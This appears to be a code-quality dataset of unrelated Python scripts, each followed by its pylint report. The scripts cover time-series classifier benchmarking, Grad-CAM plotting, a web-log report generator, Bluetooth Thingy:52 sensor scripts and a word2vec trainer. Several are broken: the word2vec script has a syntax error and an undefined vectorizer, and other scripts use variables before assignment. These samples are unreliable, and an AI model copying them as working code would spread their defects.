range(100): 94 alpaca.predict(sample, voting='veto') 95 end = time.time() 96 timing.append([(end - start) * 10, s]) # in ms 97 98 99 # SAVE OUTLIERS (with y_pred,y_pred_bin, y_true) 100 idx = np.where(y_test_bin != y_pred_bin) 101 # Flattened curves 102 for i in idx[0]: 103 outliers.append([X_test[i], 104 y_pred[i], 105 y_test[i], 106 y_pred_bin[i], 107 y_test_bin[i]]) 108 """ 109 t_end = time.time() 110 print("Substest finished, duration ",(t_end-t_start)) 111 112 # SAVE ALL RESULTS PER DATASET 113 df = pd.DataFrame(results, columns=['resampling', 'test', 'metric', 'value']) 114 df.to_csv("..\\results\\Test"+dataset+".csv") 115 #df = pd.DataFrame(timing, columns=['time', 'resampling']) 116 #df.to_csv("..\\results\\Timing"+dataset+".csv") 117 #df = pd.DataFrame(outliers, columns=['sample', 'y_pred', 'y_test', 'y_pred_bin', 'y_test_bin']) 118 #df.to_pickle("..\\results\\Outliers"+dataset+".pkl") 119 120 121 #plot_confusion_matrix(y_test_bin.astype(int), y_pred_bin.astype(int), np.array(["0", "1"]), cmap=plt.cm.Blues) 122 #plt.show() 123 #plot_confusion_matrix(y_test.astype(int), y_pred.astype(int), np.array(["0", "1", "2", "3", "?"]), cmap=plt.cm.Greens) 124 #plt.show() 125 126 127
51 - error: possibly-used-before-assignment 89 - warning: pointless-string-statement 2 - warning: unused-import
1 from alpaca import Alpaca 2 from utils import to_time_series_dataset, to_dataset, split_df, TimeSeriesResampler 3 import time 4 import numpy as np 5 import pandas as pd 6 from sklearn.pipeline import Pipeline 7 8 max_sample = 20 9 10 for dataset in ['uc2']: 11 if dataset == 'uc1': 12 X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'), 13 index_column='run_id', 14 feature_columns=['fldPosition', 'fldCurrent'], 15 target_name='target') 16 y = np.array(y) 17 # Length of timeseries for resampler and cnn 18 sz = 38 19 # Number of channels for cnn 20 num_channels = len(X[0][0]) 21 # Number of classes for cnn 22 num_classes = np.unique(y).shape[0] 23 if dataset == 'uc2': 24 X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'), 25 index_column='run_id', 26 feature_columns=['position', 'force'], 27 target_name='label') 28 y = np.array(y) 29 # Length of timeseries for resampler and cnn 30 sz = 200 31 # Number of channels for cnn 32 num_channels = len(X[0][0]) 33 # Number of classes for cnn 34 num_classes = np.unique(y).shape[0] 35 36 resampler = TimeSeriesResampler(sz=sz) 37 alpaca = Pipeline([('resampler', resampler), 38 ('classifier', Alpaca())]) 39 alpaca.fit(X, y, classifier__stacked=False, classifier__n_clusters=200) 40 41 # Measure time for single sample processing 42 t = [] 43 for i in range(1, max_sample+1): 44 for j in range(10): 45 rand = np.random.randint(2000) 46 sample = np.transpose(to_time_series_dataset(X[rand]), (2, 0, 1)) 47 start = time.process_time() 48 for k in range(100): 49 for l in range(i): 50 y_pred_bin, y_pred = alpaca.predict(sample, voting='veto') 51 end = time.process_time() 52 t.append([i, (end-start)/100, 'single']) 53 54 # Measure time for batch processing of multiple sample numbers 55 for i in range(1, max_sample+1): 56 for j in range(10): 57 rand = np.random.randint(2000) 58 if i == 1: 59 sample = np.transpose(to_time_series_dataset(X[rand]), (2, 0, 1)) 60 else: 61 sample = to_dataset(X[rand:rand+i]) 62 63 start = time.process_time() 64 for k in range(100): 65 y_pred_bin, y_pred = alpaca.predict(sample, voting='veto') 66 end = time.process_time() 67 t.append([i, (end-start)/100, 'batch']) 68 69 df = pd.DataFrame(t, columns=['Sample Number', 'Time', 'Type']) 70 df.to_csv("..\\results\\Time_"+dataset+".csv") 71 72 73 74
36 - error: possibly-used-before-assignment
1 import tensorflow.keras.backend as K 2 import tensorflow.keras 3 from tensorflow.keras.layers import Lambda 4 from tensorflow.keras.models import Model, load_model 5 tensorflow.compat.v1.disable_eager_execution() 6 import tensorflow as tf 7 8 import pandas as pd 9 import numpy as np 10 import matplotlib.pyplot as plt 11 12 from utils import to_time_series_dataset, split_df, load_test, TimeSeriesResampler, TimeSeriesScalerMeanVariance 13 from scipy.interpolate import interp1d 14 15 import seaborn as sns 16 sns.set(style='white',font='Palatino Linotype',font_scale=1,rc={'axes.grid' : False}) 17 18 19 def get_model(id): 20 model = load_model('.\\models\\cam_cnn_'+id+'.h5') 21 return model 22 23 24 def target_category_loss(x, category_index, nb_classes): 25 return tf.multiply(x, K.one_hot([category_index], nb_classes)) 26 27 28 def target_category_loss_output_shape(input_shape): 29 return input_shape 30 31 32 def normalize(x): 33 # utility function to normalize a tensor by its L2 norm 34 return x / (K.sqrt(K.mean(K.square(x))) + 1e-5) 35 36 37 def load_data(dataset): 38 if dataset == 'test': 39 X, y = load_test() 40 sz = 230 41 elif dataset == 'uc1': 42 X, y = split_df(pd.read_pickle('..\\data\\df_uc1.pkl'), 43 index_column='run_id', 44 feature_columns=['fldPosition', 'fldCurrent'], 45 target_name='target') 46 # Length of timeseries for resampler and cnn 47 sz = 38 48 elif dataset == 'uc2': 49 X, y = split_df(pd.read_pickle('..\\data\\df_uc2.pkl'), 50 index_column='run_id', 51 feature_columns=['position', 'force'], 52 target_name='label') 53 # Length of timeseries for resampler and cnn 54 sz = 200 55 resampler = TimeSeriesResampler(sz=sz) 56 X = resampler.fit_transform(X, y) 57 y = np.array(y) 58 return X, y 59 60 61 def get_sample(X, y, label, rs=100): 62 s = np.random.RandomState(rs) 63 s = s.choice(np.where(y == label)[0], 1) 64 x_raw = to_time_series_dataset(X[s, :, :]) 65 scaler = TimeSeriesScalerMeanVariance(kind='constant') 66 X = scaler.fit_transform(X) 67 x_proc = to_time_series_dataset(X[s, :, :]) 68 return x_proc, x_raw 69 70 71 def _compute_gradients(tensor, var_list): 72 grads = tf.gradients(tensor, var_list) 73 return [grad if grad is not None else tf.zeros_like(var) for var, grad in zip(var_list, grads)] 74 75 76 def grad_cam(input_model, data, category_index, nb_classes, layer_name): 77 # Lambda function for getting target category loss 78 target_layer = lambda x: target_category_loss(x, category_index, nb_classes) 79 # Lambda layer for function 80 x = Lambda(target_layer, output_shape = target_category_loss_output_shape)(input_model.output) 81 # Add Lambda layer as output to model 82 model = Model(inputs=input_model.input, outputs=x) 83 #model.summary() 84 # Function for getting target category loss y^c 85 loss = K.sum(model.output) 86 # Get the layer with "layer_name" as name 87 conv_output = [l for l in model.layers if l.name == layer_name][0].output 88 # Define function to calculate gradients 89 grads = normalize(_compute_gradients(loss, [conv_output])[0]) 90 gradient_function = K.function([model.input], [conv_output, grads]) 91 92 # Calculate convolution layer output and gradients for datasample 93 output, grads_val = gradient_function([data]) 94 output, grads_val = output[0, :], grads_val[0, :, :] 95 96 # Calculate the neuron importance weights as mean of gradients 97 weights = np.mean(grads_val, axis = 0) 98 # Calculate CAM by multiplying weights with the respective output 99 cam = np.zeros(output.shape[0:1], dtype = np.float32) 100 for i, w in enumerate(weights): 101 cam += w * output[:, i] 102 # Interpolate CAM to get it back to the original data resolution 103 f = interp1d(np.linspace(0, 1, cam.shape[0]), cam, kind="slinear") 104 cam = f(np.linspace(0,1,data.shape[1])) 105 # Apply ReLU function to only get positive values 106 cam[cam < 0] = 0 107 108 return cam 109 110 111 def plot_grad_cam(cam, raw_input, cmap, alpha, language='eng'): 112 fig, ax = plt.subplots(raw_input.shape[-1], 1, figsize=(15, 9), sharex=True) 113 # fig.suptitle('Gradient Class Activation Map for sample of class %d' %predicted_class) 114 if language == 'eng': 115 ax_ylabel = [r"Position $\mathit{z}$ in mm", r"Velocity $\mathit{v}$ in m/s", r"Current $\mathit{I}$ in A"] 116 if language == 'ger': 117 ax_ylabel = [r"Position $\mathit{z}$ in mm", r"Geschwindigkeit $\mathit{v}$ in m/s", r"Stromstärke $\mathit{I}$ in A"] 118 for i, a in enumerate(ax): 119 left, right = (-1, raw_input.shape[1] + 1) 120 range_input = raw_input[:, :, i].max() - raw_input[:, :, i].min() 121 down, up = (raw_input[:, :, i].min() - 0.1 * range_input, raw_input[:, :, i].max() + 0.1 * range_input) 122 a.set_xlim(left, right) 123 a.set_ylim(down, up) 124 a.set_ylabel(ax_ylabel[i]) 125 im = a.imshow(cam.reshape(1, -1), extent=[left, right, down, up], aspect='auto', alpha=alpha, cmap=cmap) 126 a.plot(raw_input[0, :, i], linewidth=2, color='k') 127 fig.subplots_adjust(right=0.8) 128 cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7]) 129 cbar = fig.colorbar(im, cax=cbar_ax) 130 if language == 'eng': 131 cbar_ax.set_ylabel('Activation', rotation=90, labelpad=15) 132 if language == 'ger': 133 cbar_ax.set_ylabel('Aktivierung', rotation=90, labelpad=15) 134 return ax 135 136 if __name__ == "__main__": 137 138 X, y = load_data('test') 139 nb_classes = np.unique(y).shape[0] 140 # Load model and datasample 141 preprocessed_input, raw_input = get_sample(X, y, label=1) 142 model = get_model('test') 143 144 # Get prediction 145 predictions = model.predict(preprocessed_input) 146 predicted_class = np.argmax(predictions) 147 print('Predicted class: ', predicted_class) 148 149 # Calculate Class Activation Map 150 cam = grad_cam(model, preprocessed_input, predicted_class, nb_classes, 'block2_conv1') 151 ax = plot_grad_cam(cam, raw_input, 'jet', 1) 152 plt.show() 153
19 - warning: redefined-builtin 20 - warning: redefined-outer-name 24 - warning: redefined-outer-name 39 - warning: redefined-outer-name 39 - warning: redefined-outer-name 55 - error: possibly-used-before-assignment 56 - error: used-before-assignment 56 - error: used-before-assignment 61 - warning: redefined-outer-name 61 - warning: redefined-outer-name 62 - error: no-member 76 - refactor: too-many-locals 76 - warning: redefined-outer-name 82 - warning: redefined-outer-name 99 - warning: redefined-outer-name 111 - refactor: too-many-locals 111 - warning: redefined-outer-name 111 - warning: redefined-outer-name 112 - warning: redefined-outer-name 124 - error: possibly-used-before-assignment 129 - warning: unused-variable
1 from alpaca import Alpaca 2 from utils import load_test, split_df, TimeSeriesResampler,confusion_matrix 3 import time 4 from sklearn.model_selection import train_test_split 5 from sklearn.utils import shuffle 6 from sklearn.pipeline import Pipeline 7 import numpy as np 8 import pandas as pd 9 10 11 if __name__ == '__main__': 12 13 X, y = load_test() 14 # Length of timeseries for resampler and cnn 15 sz = 230 16 # Number of channels for cnn 17 num_channels = X.shape[-1] 18 # Number of classes for cnn 19 num_classes = np.unique(y).shape[0] 20 classes = np.array(["0", "1", "2", "3", "4", "?"]) 21 22 repetitions = 1 23 24 results = [] 25 outliers = np.empty((0, 230*3+5)) 26 27 for r in range(repetitions): 28 print("Repetition #",r) 29 30 X, y = shuffle(X, y, random_state=r) 31 # Turn y to numpy array 32 y = np.array(y) 33 # Split into train and test sets 34 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=r) 35 36 for votingstr in ["democratic", "veto", "stacked_svc", "stacked_dtc"]: 37 38 if votingstr == 'stacked_svc': 39 meta = 'svc' 40 elif votingstr == 'stacked_dtc': 41 meta = 'dtc' 42 43 if votingstr == 'stacked_svc' or votingstr == 'stacked_dtc': 44 voting = 'stacked' 45 stacked = True 46 else: 47 stacked = False 48 voting = votingstr 49 meta = None 50 51 # Build pipeline from resampler and estimator 52 resampler = TimeSeriesResampler(sz=sz) 53 alpaca = Pipeline([('resampler', resampler), 54 ('classifier', Alpaca())]) 55 alpaca.fit(X_train, y_train, classifier__stacked=stacked, classifier__n_clusters=100) 56 y_pred_bin, y_pred = alpaca.predict(X_test, voting=voting) 57 58 # Plot confusion matrix (Binary) 59 y_test_bin = np.copy(y_test) 60 y_test_bin[y_test_bin > 0] = 1 61 62 tn, fp, fn, tp = confusion_matrix(y_test_bin, y_pred_bin).ravel() 63 64 # Append overall error 65 results.append([votingstr, r, 'err', (fp+fn)/(tn+fp+fn+tp)]) 66 67 # Append false negative rate 68 results.append([votingstr, r, 'fnr', fn/(fn+tp)]) 69 70 # Append false positive rate 71 results.append([votingstr, r, 'fpr', fp/(fp+tn)]) 72 73 # Save misclassified samples (with y_pred,y_pred_bin, y_true, and voting scheme) 74 idx = np.where(y_test_bin != y_pred_bin) 75 # Flattened curves 76 curves = X_test[idx].transpose(0, 2, 1).reshape(X_test[idx].shape[0],-1) 77 vote_type = np.array([votingstr for i in range(idx[0].shape[0])]).reshape((-1,1)) 78 wrong = np.hstack([curves, y_pred[idx].reshape((-1,1)),y_test[idx].reshape((-1,1)), 79 y_pred_bin[idx].reshape((-1,1)),y_test_bin[idx].reshape((-1,1)), vote_type]) 80 outliers = np.vstack((outliers,wrong)) 81 82 83 df = pd.DataFrame(outliers) 84 df.to_csv("..\\results\\OutliersVotingTest.csv") 85 86 df = pd.DataFrame(results, columns=['voting', 'test', 'metric', 'value']) 87 df.to_csv("..\\results\\VotingTest.csv") 88 89
43 - refactor: consider-using-in 2 - warning: unused-import 3 - warning: unused-import
1 import numpy as np 2 import pandas as pd 3 from utils import split_df, TimeSeriesResampler, plot_confusion_matrix, Differentiator 4 from alpaca import Alpaca 5 from sklearn.model_selection import train_test_split 6 from sklearn.pipeline import Pipeline 7 import matplotlib.pyplot as plt 8 9 if __name__ == "__main__": 10 11 """ 12 IMPORT YOUR DATA HERE 13 X, y = 14 DEFINE RESAMPLING LENGTH IF NEEDED 15 sz = 16 """ 17 18 # Turn y to numpy array 19 y = np.array(y) 20 # Split into train and test sets 21 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y, random_state=42) 22 23 # Pipeline example 24 alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=sz)),('alpaca', Alpaca())]) 25 alpaca.fit(X_train, y_train) 26 27 """ 28 # Example with additional channel derived from channel 0 29 alpaca = Pipeline([('resampler', TimeSeriesResampler(sz=sz)), 30 ('differentiator',Differentiator(channel=0)), 31 ('alpaca', Alpaca())]) 32 """ 33 34 y_pred_bin_veto, y_pred_veto = alpaca.predict(X_test, voting="veto") 35 y_pred_bin_dem, y_pred_dem = alpaca.predict(X_test, voting="democratic") 36 y_pred_bin_meta_dtc, y_pred_meta_dtc = alpaca.predict(X_test, voting="meta_dtc") 37 y_pred_bin_meta_svc, y_pred_meta_svc = alpaca.predict(X_test, voting="meta_svc") 38 39 # Store all results in a dataframe 40 y_pred_indiv = np.column_stack((y_pred_bin_veto, y_pred_veto,y_pred_bin_dem, y_pred_dem, y_pred_bin_meta_dtc, 41 y_pred_meta_dtc, y_pred_bin_meta_svc, y_pred_meta_svc, y_test)).astype(int) 42 df_results = pd.DataFrame(y_pred_indiv, columns = ['y_pred_bin_veto', 'y_pred_veto','y_pred_bin_dem', 43 'y_pred_dem', 'y_pred_bin_meta_dtc','y_pred_meta_dtc', 44 'y_pred_bin_meta_svc', 'y_pred_meta_svc', 'y_true']) 45 df_results.to_csv("results\\y_pred_total.csv",index=False) 46 print("TEST FINISHED SUCCESSFULLY") 47
11 - warning: pointless-string-statement 19 - error: used-before-assignment 21 - error: undefined-variable 24 - error: undefined-variable 27 - warning: pointless-string-statement 3 - warning: unused-import 3 - warning: unused-import 3 - warning: unused-import 7 - warning: unused-import
1 # -*- coding:utf-8 -*- 2 import configparser 3 4 5 class Config: 6 """get config from the ini file""" 7 8 def __init__(self, config_file): 9 all_config = configparser.RawConfigParser() 10 with open(config_file, 'r',encoding="UTF-8") as cfg_file: 11 all_config.readfp(cfg_file) 12 13 self.log_format = all_config.get('format', 'log-format') 14 self.log_pattern = all_config.get('format', 'log-pattern') 15 16 self.support_method = all_config.get('filter', 'support_method').split(',') 17 self.is_with_parameters = int(all_config.get('filter', 'is_with_parameters')) 18 self.always_parameter_keys = all_config.get('filter', 'always_parameter_keys').split(',') 19 self.urls_most_number = int(all_config.get('filter', 'urls_most_number')) 20 self.urls_pv_threshold = int(all_config.get('filter', 'urls_pv_threshold')) 21 self.urls_pv_threshold_time = int(all_config.get('filter', 'urls_pv_threshold_time')) 22 self.urls_pv_threshold_min = int(all_config.get('filter', 'urls_pv_threshold_min')) 23 24 self.ignore_url_suffix = all_config.get('filter', 'ignore_url_suffix').split(',') 25 26 self.fixed_parameter_keys = all_config.get('filter', 'fixed_parameter_keys').split(',') 27 self.custom_parameters_list = all_config.get('filter', 'custom_parameters').split(',') 28 self.custom_keys = [] 29 self.custom_parameters = {} 30 for item in self.custom_parameters_list: 31 key = item.split('=')[0] 32 if len(item.split('=')) == 2: 33 value = item.split('=')[1] 34 else: 35 value = '' 36 self.custom_parameters.setdefault(key, value) 37 self.custom_keys.append(key) 38 self.ignore_urls = all_config.get('filter', 'ignore_urls').split(',') 39 self.static_file = all_config.get('filter', 'static-file').split(',') 40 41 self.second_line_flag = int(all_config.get('report', 'second_line_flag')) 42 self.cost_time_flag = int(all_config.get('report', 'cost_time_flag')) 43 self.cost_time_percentile_flag = int(all_config.get('report', 'cost_time_percentile_flag')) 44 self.cost_time_threshold = all_config.get('report', 'cost_time_threshold') 45 self.upload_flag = int(all_config.get('report', 'upload_flag')) 46 self.upload_url = all_config.get('report', 'upload_url') 47 48 self.goaccess_flag = int(all_config.get('goaccess', 'goaccess_flag')) 49 self.time_format = all_config.get('goaccess', 'time-format') 50 self.date_format = all_config.get('goaccess', 'date-format') 51 self.goaccess_log_format = all_config.get('goaccess', 'goaccess-log-format') 52 53 config = Config('../conf/config.ini')
5 - refactor: too-many-instance-attributes 11 - warning: deprecated-method 5 - refactor: too-few-public-methods
1 # -*- coding:utf-8 -*- 2 import json 3 import requests 4 5 from util import get_dir_files 6 from config import config 7 from jinja2 import Environment, FileSystemLoader 8 9 env = Environment(loader=FileSystemLoader('./templates')) 10 report_template = env.get_template('report.html') 11 index_template = env.get_template('index.html') 12 url_template = env.get_template('url.html') 13 14 15 def upload_report(data, hours_times, minutes_times): 16 target_file = data['source_file'] 17 pv = data['pv'] 18 uv = data['uv'] 19 get_count = data['method_counts']['get'] 20 get_percent = data['method_counts']['get_percentile'] 21 post_count = data['method_counts']['post'] 22 post_percent = data['method_counts']['post_percentile'] 23 response_peak = data['response_peak'] 24 response_peak_time = data['response_peak_time'] 25 response_avg = data['response_avg'] 26 hours_times = hours_times 27 hours_pv = data['hours_hits'] 28 hours_most_common = data['hours_hits'].most_common(1)[0] 29 hours_pv_peak = hours_most_common[1] 30 hours_pv_peak_time = hours_most_common[0] 31 minute_times = minutes_times 32 minute_pv = data['minutes_hits'] 33 minute_most_common = data['minutes_hits'].most_common(1)[0] 34 minute_pv_peak = minute_most_common[1] 35 minute_pv_peak_time = minute_most_common[0] 36 cost_percent = data['cost_time_range_percentile'] 37 cost_time_threshold = data['cost_time_threshold'] 38 cost_range = data['cost_time_range'] 39 url_data_list = [] 40 41 for url_data in data['url_data_list']: 42 url_data_list.append(url_data.get_data()) 43 44 data = {'target_file': target_file, 'pv': pv, 'uv': uv, 45 'get_count': get_count, 'get_percent': get_percent, 46 'post_count': post_count, 'post_percent': post_percent, 47 'response_peak': response_peak, 'response_peak_time': response_peak_time, 48 'response_avg': response_avg, 49 'hours_times': hours_times, 50 'hours_pv': hours_pv, 51 'hours_pv_peak': hours_pv_peak, 52 'hours_pv_peak_time': hours_pv_peak_time, 53 'minute_times': minute_times, 54 'minute_pv': minute_pv, 55 'minute_pv_peak': minute_pv_peak, 56 'minute_pv_peak_time': minute_pv_peak_time, 57 'cost_percent': cost_percent, 58 'cost_percent_range': ['<50ms', '50~100ms', '100~150ms', '150~200ms', '200~250ms', '250~300ms', 59 '300~350ms', '350~400ms', '400~450ms', '450~500ms', '>500ms'], 60 'cost_time_threshold': cost_time_threshold, 61 'url_data_list': url_data_list, 62 'cost_range': cost_range, 63 'status_codes': data['status_codes']} 64 headers = {'Content-Type': 'application/json'} 65 r = requests.post(config.upload_url, data=json.dumps(data), headers=headers) 66 print(r.text) 67 68 69 def generate_web_log_parser_report(data): 70 if config.goaccess_flag: 71 data.setdefault('goaccess_file', data.get('source_file') + '_GoAccess.html') 72 data.setdefault('goaccess_title', u'查看GoAccess生成报告') 73 else: 74 data.setdefault('goaccess_file', '#') 75 data.setdefault('goaccess_title', u'GoAccess报告已设置为无效,无法查看') 76 77 hours_times = sorted(list(data.get('hours_hits'))) 78 minutes_times = sorted(list(data.get('minutes_hits'))) 79 seconds_times = sorted(list(data.get('second_hits'))) 80 81 if config.upload_flag: 82 upload_report(data, hours_times, minutes_times) 83 84 html = report_template.render(data=data, 85 web_log_urls_file=data.get('source_file') + '_urls.html', 86 second_line_flag=config.second_line_flag, 87 hours_times=hours_times, 88 minutes_times=minutes_times, 89 seconds_times=seconds_times, 90 method_counts=data.get('method_counts'), 91 cost_time_range_percentile=data.get('cost_time_range_percentile'), 92 cost_time_list=data.get('cost_time_list'), 93 cost_time_flag=data.get('cost_time_flag'), 94 cost_time_percentile_flag=data.get('cost_time_percentile_flag'), 95 cost_time_threshold=data.get('cost_time_threshold'), 96 cost_time_range=data.get('cost_time_range'), 97 status_codes=data.get('status_codes'), 98 status_codes_keys=data.get('status_codes').keys()) 99 100 html_file = '../result/report/' + data.get('source_file') + '.html' 101 with open(html_file, 'wb') as f: 102 f.write((html.encode('utf-8'))) 103 104 105 def generate_web_log_parser_urls(data): 106 html = url_template.render(data=data, 107 url_datas=sorted(data.get('urls'))) 108 109 html_file = '../result/urls/' + data.get('source_file') + '_urls.html' 110 with open(html_file, 'wb') as f: 111 f.write((html.encode('utf-8'))) 112 113 114 def update_index_html(): 115 html = index_template.render(files=sorted(get_dir_files('../result/report/'))) 116 117 with open('../result/index.html', 'wb') as f: 118 f.write((html.encode('utf-8')))
15 - refactor: too-many-locals 26 - warning: self-assigning-variable 65 - warning: missing-timeout 72 - warning: redundant-u-string-prefix 75 - warning: redundant-u-string-prefix
1 ##Main 2 3 from bluepy import btle 4 from bluepy.btle import Peripheral, DefaultDelegate 5 import os.path 6 import struct 7 import binascii 8 import sys 9 import datetime 10 import time 11 from time import time,sleep 12 import Services 13 from Services import EnvironmentService, BatterySensor, UserInterfaceService, MotionService, DeviceDelegate 14 import Device 15 from Device import Device 16 from urllib.request import urlopen 17 18 19 ##Mac 1: FD:88:50:58:E7:45 20 ##Mac 2: E4:F6:C5:F7:03:39 21 22 ## MAC address Device device 23 global MAC 24 25 26 if __name__ == "__main__": 27 MAC = str(sys.argv[1]) 28 29 30 31 print("Connecting to " + MAC) 32 Device1 = Device(MAC) 33 print("Connected...") 34 print("Bonding...") 35 Device1.setSecurityLevel("medium") 36 print("Bonded...") 37 38 39 print("Enabling Services...") 40 Device1.battery.enable() 41 #~ Device1.ui.enable() 42 Device1.motion.enable() 43 44 45 46 Device1.setDelegate(DeviceDelegate()) 47 48 print('Services Enabled...') 49 50 print('Battery Level(1): ', Device1.battery.b_read(), '%') 51 52 53 54 55 #~ Device1.ui.set_led_mode_breathe(0x02, 50, 1000) 56 ##Battery sensor 57 #~ Device1.battery.set_battery_notification(True) 58 59 ##UI service 60 #~ Device1.ui.set_button_notification(True) 61 62 ##Motion Services 63 Device1.motion.configure(motion_freq=5) 64 #~ Device1.motion.set_tap_notification(True) 65 #~ Device1.motion.set_orient_notification(True) 66 #~ Device1.motion.set_quaternion_notification(True) 67 #~ Device1.motion.set_stepcount_notification(True) 68 #~ Device1.motion.set_rawdata_notification(True) 69 Device1.motion.set_euler_notification(True) 70 #~ Device1.motion.set_rotation_notification(True) 71 #~ Device1.motion.set_heading_notification(True) 72 #~ Device1.motion.set_gravity_notification(True) 73 74 75 76 77 78 79 try: 80 while True: 81 if Device1.waitForNotifications(180.0) : 82 # handleNotification() was called 83 continue 84 print("Waiting...") 85 86 87 88 except KeyboardInterrupt: 89 print("Disabling Notifications and Indications...") 90 Device1.battery.disable() 91 Device1.ui.disable() 92 Device1.motion.disable() 93 print("Notifications and Indications Disabled...") 94 print("Device Session Finished...")
23 - warning: global-at-module-level 3 - warning: unused-import 4 - warning: unused-import 4 - warning: unused-import 5 - warning: unused-import 6 - warning: unused-import 7 - warning: unused-import 9 - warning: unused-import 10 - warning: unused-import 11 - warning: unused-import 12 - warning: unused-import 13 - warning: unused-import 13 - warning: unused-import 13 - warning: unused-import 13 - warning: unused-import 16 - warning: unused-import
1 ##################################################################### 2 # BLE devices handler # 3 # A new subprocess is created for each preregistered device in: # 4 # ./devices.mac # 5 ##################################################################### 6 7 import subprocess 8 import time 9 10 #~ mac_file = open('devices.mac', 'r') 11 12 #~ for mac_address in mac_file: 13 #~ subprocess.call(['gnome-terminal', '-e', 'python3 main.py ' + mac_address]) 14 #~ time.sleep(10) 15 16 subprocess.call(['gnome-terminal', '-e', 'python3 main.py FD:88:50:58:E7:45' ]) 17 time.sleep(20) 18 subprocess.call(['gnome-terminal', '-e', 'python3 mainMotion.py E4:F6:C5:F7:03:39' ])
Clean Code: No Issues Detected
1 2 3 from bluepy import btle 4 from bluepy.btle import Peripheral, DefaultDelegate 5 import Services 6 from Services import EnvironmentService, BatterySensor, UserInterfaceService, MotionService, DeviceDelegate 7 8 9 ## Thingy52 Definition 10 11 class Device(Peripheral): 12 ##Thingy:52 module. Instance the class and enable to get access to the Thingy:52 Sensors. 13 #The addr of your device has to be know, or can be found by using the hcitool command line 14 #tool, for example. Call "> sudo hcitool lescan" and your Thingy's address should show up. 15 16 def __init__(self, addr): 17 Peripheral.__init__(self, addr, addrType="random") 18 19 #Thingy configuration service not implemented 20 self.battery = BatterySensor(self) 21 self.environment = EnvironmentService(self) 22 self.ui = UserInterfaceService(self) 23 self.motion = MotionService(self) 24 #self.sound = SoundService(self) 25 26 27 28 29 30
11 - refactor: too-few-public-methods 3 - warning: unused-import 4 - warning: unused-import 5 - warning: unused-import 6 - warning: unused-import
1 # coding=utf-8 2 import codecs 3 import re 4 from abstract import Abstract 5 6 __author__ = 'rcastro' 7 8 from gensim.models import Word2Vec 9 from codecs import open 10 import nltk 11 #nltk.download() # Download text data sets, including stop words 12 from nltk.corpus import stopwords # Import the stop word list 13 import numpy as np 14 15 #model = Word2Vec.load_word2vec_format("/Users/rcastro/nltk_data/word2vec_models/GoogleNews-vectors-negative300.bin", binary=True) 16 #print(model.most_similar('Crayfish', topn=5)) 17 18 print ("get the abstracts") 19 text = '' 20 try: 21 with codecs.open('/Users/rcastro/dev/abstracts.txt', 'r', encoding='utf8') as abstracts_file: 22 text = abstracts_file.read().strip() 23 except IOError as e: 24 print ('Operation failed: %s' % e.strerror) 25 26 abstracts = [Abstract(x) for x in text.split("\r\n\r\n")] 27 num_reviews = len(abstracts) 28 clean_train_reviews = [x.text for x in abstracts] 29 30 def remove_numeric_tokens(string): 31 return re.sub(r'\d+[^\w|-]+', ' ', string) 32 33 vectorizer = TfidfVectorizer(analyzer="word", 34 tokenizer=None, 35 preprocessor=remove_numeric_tokens, 36 stop_words='english', 37 lowercase=True, 38 ngram_range=(1, 2), 39 min_df=1, 40 max_df=1, # quizas probar con 0.8 x ahi 41 token_pattern=r"(?u)\b[\w][\w|-]+\b", 42 max_features=155000) 43 analyzer = vectorizer.build_analyzer() 44 45 review_lists = [analyzer(w) for w in clean_train_reviews] 46 47 48 49 # Download the punkt tokenizer for sentence splitting 50 import nltk.data 51 # Load the punkt tokenizer 52 tokenizer = nltk.data.load('tokenizers/punkt/english.pickle') 53 54 55 # Define a function to split a review into parsed sentences 56 def review_to_sentences( review, tokenizer, remove_stopwords=True ): 57 # Function to split a review into parsed sentences. Returns a 58 # list of sentences, where each sentence is a list of words 59 # 60 # 1. Use the NLTK tokenizer to split the paragraph into sentences 61 raw_sentences = tokenizer.tokenize(review.strip()) 62 # 63 # 2. Loop over each sentence 64 sentences = [] 65 for raw_sentence in raw_sentences: 66 # If a sentence is empty, skip it 67 if len(raw_sentence) > 0: 68 # Otherwise, call review_to_wordlist to get a list of words 69 sentences.append( ) 70 # 71 # Return the list of sentences (each sentence is a list of words, 72 # so this returns a list of lists 73 return sentences 74 75 sentences = [] # Initialize an empty list of sentences 76 77 print "Parsing sentences from training set" 78 for review in clean_train_reviews: 79 sentences += review_to_sentences(review, tokenizer) 80 81 82 # Import the built-in logging module and configure it so that Word2Vec 83 # creates nice output messages 84 import logging 85 logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', 86 level=logging.INFO) 87 88 # Set values for various parameters 89 num_features = 400 # Word vector dimensionality 90 min_word_count = 1 # Minimum word count 91 num_workers = 4 # Number of threads to run in parallel 92 context = 20 # Context window size 93 downsampling = 1e-3 # Downsample setting for frequent words 94 95 # Initialize and train the model (this will take some time) 96 from gensim.models import word2vec 97 print "Training model..." 98 99 # bigram_transformer = gensim.models.Phrases(sentences) 100 # >>> model = Word2Vec(bigram_transformer[sentences], size=100, ...) 101 102 model = word2vec.Word2Vec(sentences, workers=num_workers, 103 size=num_features, min_count = min_word_count, 104 window = context, sample = downsampling, batch_words = 1000) 105 106 # If you don't plan to train the model any further, calling 107 # init_sims will make the model much more memory-efficient. 108 model.init_sims(replace=True) 109 110 # It can be helpful to create a meaningful model name and 111 # save the model for later use. You can load it later using Word2Vec.load() 112 model_name = "400features_2minwords_20context" 113 model.save(model_name) 114 115 print model.doesnt_match("man woman child kitchen".split()) 116 print model.doesnt_match("france england germany berlin".split()) 117 print model.most_similar("prawn", topn=10)
77 - error: syntax-error
